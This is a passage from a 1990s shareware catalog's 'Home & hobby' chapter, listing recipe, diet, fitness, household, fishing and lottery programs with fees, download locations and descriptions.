discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: SHOTZ300.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SHOTZ.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + Download size: 233k (about 18 minutes with a 2400 baud modem) + Description: + Originally designed to handle immunization tracking for a USAF + Reserve unit, this program has been "adopted" by many non- + profit organizations and families as an easy way to track + immunization due dates. Handles up to 10,000 people for 12 + different immunizations. User can change immunization tracked + and dues dates as the need arises. Prints or allows viewings + of lists and produces letters when shot is overdue. All + proceeds from this program go to the American Red Cross. + + + 15.10.1 Food/dietary/kitchen + + Product: From Scratch recipe processor + Author: Desktop Solutions, 516-493-3422 + Version: 3.04 (11-01-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $34.95 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to U.S. addresses) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, CompuServe, mail support; lifetime + return policy; bonus data; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; FS*.ZIP on CompuServe in + CIS:COOKS forum LIBrary 0 (multiple files) (or contact userID + 74676,3314 for assistance). + SWREG#: 2554 + PsL#: 10678 + Download size: 1k (about one minute with a 2400 baud modem) + Description: + Easy to use Windows recipe program! Unlimited number of + ingredients per recipe, and any number of recipes. + Sophisticated printing with combination of fonts. Complete + + Chapter 15, "Home & hobby" 609 + + + + search capability, yield conversion, fractions, shopping list, + and more. Calculates nutrition information from a 4400 item + USDA database. Prints on 3X5 cards. Converts from Meal Master, + Compu-chef, and Micro Kitchen recipes, as well as allows + swapping recipes with other From Scratch users. Stores data in + dBase IV compatible files. + + + Product: Grocery Manager for Windows + Author: Absolute Value Software + Version: 2.31 (11-05-94) + Needs: IBM AT (80286), Windows 3.1 or better. CGA monitor; Hard + disk; Mouse; VBRUN200.DLL. + Strongly recommended: VGA monitor. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 1-month return + policy; discounts on other products. 12-month free upgrading + allowed. + Look for: GMW231.ZIP on BBSs (call 715-652-2758 to download it at + no charge); GMW231.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 72327,1673 for assistance). + PsL#: 10646 + Download size: 460k (about 34 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Helps you do your meal planning and grocery shopping. + Simplifies and speeds up the process of making a menu and + shopping list. You input how many days you would like to plan + meals for, then what dishes you want to have on each day. The + ingredients that each dish is made of are saved (part of the + setup process), so when a meal is planned for a certain day, + the ingredients for that meal will be automatically included in + a shopping list it generates. + + + Product: Heart Smart + Author: Henning Associates, 804-823-6896 + Version: 2.0 (04-25-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + + Chapter 15, "Home & hobby" 610 + + + + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; HSMART.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Designed to help you eat healthier and help your heart out. Has + a modifiable food list of 900 items and allows you to plan a + 7-day menu and print the menu out to a graphics printer. Keep + calorie counts by meal, by the day, or for the whole week. + Automatically computes the percentage of fat in your diet. + Print preview function and ability to copy entire meals are + just two of the new functions. + + + Product: LEANER + Author: MoonStone Software, 505-982-7251 + Version: 2.20 (11-22-93) + Needs: IBM PC, DOS 2.11 or better. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: LEAN220.ZIP on BBSs (call 505-662-0659 to download it + at no charge); LEAN22.ZIP on CompuServe in CIS:GOODHEALTH forum + LIBrary 10 (or contact userID 71021,3617 for assistance); + LEAN220.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + Find your ideal weight. Discover your cardiovascular risks. + Check your anxiety level. Determine your eating style. Graphs + & reviews your daily, monthly & yearly progress. Tracks over + 45 different exercises. Handles groups, while password + protection ensures personal data privacy. Handles metric and + english weights and measures. Supports international date + format. Has had rave reviews. And has been found effective + for individuals and fittness salons. + + + Product: Managing Your Food + Tracks food cost, nutrition, and inventory. See full + description on page 356. + + Chapter 15, "Home & hobby" 611 + + + + Product: Master Chef Release One + Author: Acme Workshops, 513-878-6030 + Version: (01-23-93) + Needs: IBM AT (80286), DOS 3.0 or better. 580k RAM. + Registration fee: $35.00 + Registration benefits: Printed manual, quick reference card, + three months support, bonus database & utilities, 30 day money + back guarantee. + Look for: availability unknown on BBSs; MCR1*.ZIP on CompuServe + in CIS:DIABETES forum LIBrary 7 (multiple files) (or contact + userID 71371,1257 for assistance). + Download size: 650k (about 48 minutes with a 2400 baud modem) + Description: + A master kitchen management tool, providing recipe management, + diet planning, meal planning, meal scheduling, and shopping + list managment. Has a user-friendly, "windowed" user interface. + Tracks 20 nutrients and 10 food exchange categories. Manages + multiple recipe files, schedules, and meal plans. Over 800 + scalable recipes per file. Up to 93 days per schedule. Comes + with over 800 ingredients including USDA nutrient data. Costs + and scales recipes, schedules, and shopping lists. + + + Product: Master Meal Manager + Author: Acme Workshops, 513-878-6030 + Version: 1.51 (01-09-92) + Needs: IBM PC, DOS 2.0 or better. 640k RAM. + Registration fee: $25.00 + Registration benefits: Printed manual, 31/2" & 51/4" master disks, + three months support. + Look for: availability unknown on BBSs. + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + A masterful combination of user friendliness and common sense + functions making the common kitchen management chores (recipes, + meal planning, and shopping) a breeze. All three are integrated + so that your recipes are used to generate a meal schedule for + up to 14 days worth of meals. The meal schedule and recipes are + then used to generate your shopping list. Easy to learn. Easy + to use. + + + Product: Me & My Metabolism + Effects of lifestyle on your energy balance. See full + description on page 543. + + Chapter 15, "Home & hobby" 612 + + + + Product: MicroCook + Author: NORSKi Software, 414-632-9815 + Version: 1.81 (06-23-95) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Mouse; Epson printer. + Registration fee: $20.00 (add $2.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + GEnie, mail support; 3-month return policy; bonus utilities; + bonus data; all ASP-wide offers (see page 6); discounts on + upgrades. 24-month free upgrading allowed. 1 free update + disk(s) sent out. Bonus recipes. + Look for: MCOOK181.ZIP on BBSs (call 414-878-2106 to download it + at no charge); MCOOKN.ZIP on CompuServe in CIS:COOKS forum + LIBrary 0 (or contact userID 72713,1667 for assistance); + MCOOK181.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID NORSKI for assistance). + SWREG#: 3595 + PsL#: 14025 + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + A recipe collection management program for DOS with easy to use + editor, pull-down menus, and with full mouse support. Number of + recipes and databases only limited by hard disk space. Import + and Export recipes in ASCII format, and will Import ASCII + recipes from Meal-Master, MasterCook and Edna's. Powerful + searches. Duplicate recipe checking. Print to any printer, or + to disk file. Recipes included. Works great in Windows too! + + + Product: Program for a Small Planet + Author: Strat-Tech, Inc., 800-783-9544 + Version: 6.0 (10-26-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Dual 720k floppy drives. + Strongly recommended: CGA monitor; Hercules monitor; Hard disk. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + 1-month return policy; bonus data; all ASP-wide offers (see + + Chapter 15, "Home & hobby" 613 + + + + page 6); disks of other shareware; discounts on other products. + 6-month free upgrading allowed. + Look for: FOODSM60.ZIP on BBSs; FOODSM.EXE on CompuServe in + CIS:GOODHEALTH forum LIBrary 10 (or contact userID 72317,2332 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Finds healthy and delicious food combinations. We combine + foods based on "Diet for A Small Planet" by Frances Moore + Lappe. We include calorie, sodium, cholesteral, fat, fiber and + protein counts. Has computerized pantry and graphics. Develops + combinations naturally the way traditional food dishes evolve. + + + Product: Windows Gourmet + Author: Dovcom, 801-221-4527 + Version: 1.2 (01-01-95) + Needs: IBM 80386, Windows 3.1 or better. 1000k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades; + registration commissions. 3-month free upgrading allowed. + Look for: WNGOUR12.ZIP on BBSs (call 801-224-4031 to download it + at no charge); WNGOUR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 19 (or contact userID 74552,1027 for assistance). + SWREG#: 3167 + PsL#: 11406 + Download size: 339k (about 25 minutes with a 2400 baud modem) + Description: + A powerful, easy to use recipe database and meal planning + system. Familiar "recipe card" display and simple interface + allows for quick entry and indexing of hundreds of recipes. + Easily group a series of recipes together into a single meal + and adjust servings to account for any yield. Prints shopping + lists, as well as individual recipes. Can retrieve and save + Meal Master text files. + + Chapter 15, "Home & hobby" 614 + + + + 15.10.2 Exercise/fitness + + Product: AeroChart + Author: MoonStone Software, 505-982-7251 + Version: 1.20 (12-12-93) + Needs: IBM PC, DOS 2.11 or better. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; lifetime return + policy; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Look for: AC120.ZIP on BBSs (call 505-662-0659 to download it at + no charge); AC120.ZIP on CompuServe in CIS:GOODHEALTH forum + LIBrary 7 (or contact userID 71021,3617 for assistance); + AC120.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Aerobic exercise logbook. Helps you formulate a set of easy to + reach exercise goals and attain them. Graphs and reviews track + daily, monthly, and yearly progress. Supports groups. Password + protection ensures privacy for personal data. Calculates Cooper + Aerobic Points and calories expended (45+ activities). Add your + own exercise, goals, routines, and strategies. Displays + english and metric weights and measures. Automatically converts + between systems. Supports international date format. + + + Product: Bike + Author: Henning Associates, 804-823-6896 + Version: 2.0 (04-02-95) + Needs: IBM 80386, Windows 3.1 or better. 110k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; BIKE20.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Useful for the casual as well as the serious rider. Keep track + of miles ridden, average speed, average ride, etc. Display + information in numerical or graphics form. Print your ride log + and start with a fresh database every year. Features the + ability to customize two fields for your particular training + regimen. Data can be exported to another database program or + spreadsheet. + + Chapter 15, "Home & hobby" 615 + + + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 153. + + Product: From Scratch recipe processor + Recipe database for Windows with nutrition. See full + description on page 608. + + Product: LEANER + Weight control charting & motivation program. See full + description on page 610. + + Product: Me & My Metabolism + Effects of lifestyle on your energy balance. See full + description on page 543. + + Product: Program for a Small Planet + Finds healthy and delicious food combinations. See full + description on page 612. + + + 15.11 Household automation + + Product: Around The House + Complete personal/home information manager. See full + description on page 166. + + Product: Chores & Rewards + Author: K. Jeff Hayes, 919-365-6027 + Version: 1.00 (01-01-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter, mail support; + 3-month limited return policy; all ASP-wide offers (see + page 6). 3-month free upgrading allowed. 3 free update disk(s) + sent out. + Look for: availability unknown on BBSs; CHORES.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 71652,634 + for assistance). + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + System for managing childrens chores, rewards and penalties + featuring: 3 motivation/compensation methods; automatic + compensation reconciliation; performance tracking; "bank + account" management; and checklist printing. + + Chapter 15, "Home & hobby" 616 + + + + Product: JRE Home Inventory + Author: JRE Enterprises + Version: 6.3 (09-30-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: HOMI63.ZIP on BBSs (call 602-814-0483 to download it at + no charge); HOMI63.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 225 + Download size: 520k (about 39 minutes with a 2400 baud modem) + Description: + Keeps track of all your household items for insurance purposes. + Eleven different types of reports with many options for + tailoring. True print preview, ability to change printer and + screen fonts, plus much more! Categorize items by location, + room, insurance category, and personal category. + + + Product: Private Library + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.0 (04-12-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRPRI30.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Lets you put your own collections online, your books, c/d's, + audio and video tapes, more. Powerful search function lets you + look at your data in many ways. You can sort and print the + entire collection or the records you find using search. + + Chapter 15, "Home & hobby" 617 + + + + Product: Records of the Realm + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.0 (04-12-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRROR30.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Lets you keep track of those important records and items you + keep forgetting about or misplace. Forgotten where your medical + records are? How about your home title and insurance papers? + Your will? This program remembers them all. Quickeys make data + entry a snap. + + + Product: Smart10 + Author: Sympathetic Software + Version: 2.1 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. X10 PowerHouse CP290. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 36-month free + upgrading allowed. + Look for: availability unknown on BBSs; SMRTEN.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 4 (or contact userID 71046,1476 for + assistance). + PsL#: 10400 + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + Devised to overcome limitations of the CP290 and its software. + It maintains a year's calendar of events. Use Sunrise and + Sunset as times. Events can beconditioned to occur (or not) if + it is dark (or light), between dates you have specified, or on + command line parameters. + + Issue direct or delayed commands and cancel pending events. + Automate AUTOEXEC.BAT to compare the computer's date-time with + target date-times, and adjust clock for daylight savings time. + + Chapter 15, "Home & hobby" 618 + + + + Product: Super!Market + Author: Trulli Tops Software, Inc., 216-974-5189 + Version: 1.10 (12-01-93) + Needs: IBM AT (80286), DOS 3.1 or better. Hard disk. + Strongly recommended: HP LaserJet printer. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). + Look for: SUPMK*.ZIP on BBSs (call 703-680-9269 to download it at + no charge); SUPMK*.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70700,3555 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A Windows-based home productivity product used to create a + shopping list that includes prices and aisle numbers. The list + can be printed in aisle sequence with or without pricing + information. Exploits the advantages of windows facilities in + Windows or OS/2 so that operations are quick and accurate. + International customization is allowed for currency type, + decimal style, and date presentation. + + + Product: TMC Calendar & Phone Book + Calendar & phone book with phone dialer. See full description + on page 145. + + Product: WinPrice + Picks best deal from any two choices. See full description on + page 406. + + + 15.12 How-to projects + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 564. + + + 15.13 Hunting & fishing + + See also: Home & hobby, Sports, Firearms. + + Chapter 15, "Home & hobby" 619 + + + + Product: Bass Class + Author: Olsen Outdoors, 508-486-3985 + Version: 1.8 (08-04-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; bonus graphics; all ASP-wide offers (see + page 6); discounts on other products. + Look for: BCLAS18.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSCL.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 6 (or contact userID 70031,534 for assistance). + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + Highly educational and lots of fun. It's loaded with on-screen + help and even has a built in glossary of fishing terms. Totally + realistic. Has three skill levels and a great user interface. + If you're a novice, you'll appreciate the helpful suggestions. + You pros are on your own! Excellent graphics and animation. + From the author of BassTour! + + + Product: BassDuel + Author: Olsen Outdoors, 508-486-3985 + Version: 2.0 (08-04-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products. + Look for: BDUEL20.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSDU.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 6 (or contact userID 70031,534 for assistance). + Download size: 193k (about 15 minutes with a 2400 baud modem) + Description: + The most incredible fishing game of all! Two anglers fish + simultaneously from the same boat, just like the real thing. + Eight rods. Thousands of lure/color combinations. Head to head + competition against your partner and the top names in bass + fishing. Excellent graphics and animation. + + Chapter 15, "Home & hobby" 620 + + + + Product: BassTips + Author: Olsen Outdoors, 508-486-3985 + Version: 1.5 (08-06-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products. + Look for: BTIPS15.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BTIPS.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 6 (or contact userID 70031,534 for assistance). + Download size: 61k (about five minutes with a 2400 baud modem) + Description: + Sure to improve anyone's fishing! Can be configured to pop onto + your screen each time you turn on your computer. Comes with a + tip editor so you can add your own tips. Makes a great way to + start your computing session. + + + Product: BassTour + Author: Olsen Outdoors, 508-486-3985 + Version: 4.9 (08-04-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. Also supports CGA, MCGA, EGA and Hercules + monitors. + Strongly recommended: EGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; bonus graphics; all ASP-wide offers (see + page 6); discounts on other products. + Look for: BTOUR49.ZIP on BBSs (call 508-875-3618 to download it + at no charge); BASSTR.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 6 (or contact userID 70031,534 for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + The ultimate fishing game for your computer. You control a + fully rigged bass boat. Over 2300 lure/color combinations. Six + different rods. Trolling motor, LCD chart recorder and lots + more. Comes complete with six different areas to fish (the + registered version comes with 16!). Mouse support is provided, + but not necessary. Fish a 3 day tournament against 30 of the + top names in bass fishing! + + Chapter 15, "Home & hobby" 621 + + + + Product: The Deer Expert + Author: Strat-Tech, Inc., 800-783-9544 + Version: 4.2 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited tollfree 800# phone, CompuServe, mail + support; 1-month return policy; bonus data; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. + Look for: DEERHU42.ZIP on BBSs; DEERHU.EXE on CompuServe in + CIS:OUTDOOR forum LIBrary 6 (or contact userID 72317,2332 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Gives you over 100 methods for gun hunting of whitetail deer. + Has techniques for doe, small bucks, and recovery of wounded + deer. When you purchase you get bonus techniques for medium, + large bucks, recipes, and more. Also has a library of + information and an extensive logging facility! Valuable safety + information is a must! + + + Product: The Fish Expert + Author: Strat-Tech, Inc., 800-783-9544 + Version: 3.2 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. 6-month free upgrading allowed. + Look for: FISHEX32.ZIP on BBSs; FISHEX.EXE on CompuServe in + CIS:OUTDOOR forum LIBrary 5 (or contact userID 72317,2332 for + assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Contains fishing patterns and techniques as well as a fishing + log system. Recommended in Outdoor Life magazine and elsewhere. + You input conditions you fish under and program gives proven + methods to catch trout. Library, logs help you capture your own + data base. + + Chapter 15, "Home & hobby" 622 + + + + Product: FishBase ][ + Author: Olsen Outdoors, 508-486-3985 + Version: 3.0 (08-04-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products. + Look for: FBASE30.ZIP on BBSs (call 508-875-3618 to download it + at no charge); FISHBA.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 6 (or contact userID 70031,534 for assistance). + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + Records individual fish you catch. Generates lots of statistics + about them. Powerful search and sort capabilities. Fast, easy, + form oriented data entry. On-screen help. A must for the + serious angler. Can improve your fishing and make you more + competitive! + + + Product: Fishtime + Author: C & E Associates + Version: 2.2 (01-15-94) + Needs: IBM PC, DOS 2.0 or better. 100k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $15.00 + Registration benefits: printed manual; 6 months of unlimited + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6). + Look for: FSHTME22.ZI on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 60k (about five minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Hunters and fisherman have long known that a relationship + exists between the phase and position of the moon and the + activity and feeding patterns of fish and game. This calculates + the best times to hunt and fish on any given day for any + location in the continental United States based on the phase + and position of the moon. The output is a graph plotted on the + screen showing the probability of success for the 24 hour + period selected. Prime time lists are also provided. + + + Product: QBALL + Small arms exterior ballistics. See full description on + page 650. + + Chapter 15, "Home & hobby" 623 + + + + 15.14 Lottery + + Product: Lotto Challenger + Author: Data Solutions, 813-653-3093 + Version: 3.8 (05-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk; Epson printer. + Registration fee: $29.50 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; 1-month return policy; bonus data; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. 2-month free upgrading allowed. + Look for: LOTTOC38.ZIP on BBSs (call 813-653-4034 to download it + at no charge); LOTTOC.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 9 (or contact userID 72356,354 for assistance). + SWREG#: 2580 + PsL#: 11326 + Download size: 134k (about ten minutes with a 2400 baud modem) + Description: + Picks the best numbers to play based on a statistical analysis + of previously drawn lottery numbers. This is not a random + number generator. The numbers picked can be played in any of + the 20 wheeling systems that are included. Other wheeling + systems can be added if desired. Checks the tickets played + against the numbers drawn for winning matches. Includes many + charts that help you handicap lottery numbers. Works with all + lotteries that pick 5 or 6 numbers, including Powerball. + + + Product: LOTTO MANIA + Author: Robert O. Leafloor, 613-591-5525-(HOME) + Version: 2.01 (01-01-95) + Needs: IBM PC, DOS 2.1 or better. Hard disk; Epson printer. + Strongly recommended: CGA monitor. + Registration fee: $15.00 (add $15.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited CompuServe, mail + support; bonus data; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: LTMAN20*.ZIP on BBSs. + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + LOTTO MANIA v2.01 . Menu driven, supports multiple + lotteries based on 6 numbers drawn. Popular US and Canadian + databases and user support provided to paid users, otherwise + user enters their own numbers. Sample database included. + Contains number picking algorithms based on user specified + criteria. Easy to use, advanced error checking, built-in + context sensitive help. Registered users required to pay + $15.00. See also VENDINFO.DIZ for further details. + + Chapter 15, "Home & hobby" 624 + + + + Product: Lotto Prophet + Author: DataMicro, Inc., 813-629-7720 + Version: 5.0 (01-05-95) + Needs: IBM PC, DOS 2.11 or better. at least 1 720k floppy. + Registration fee: $19.50 + Registration benefits: + Look for: PROPHET5.ZIP on BBSs (call 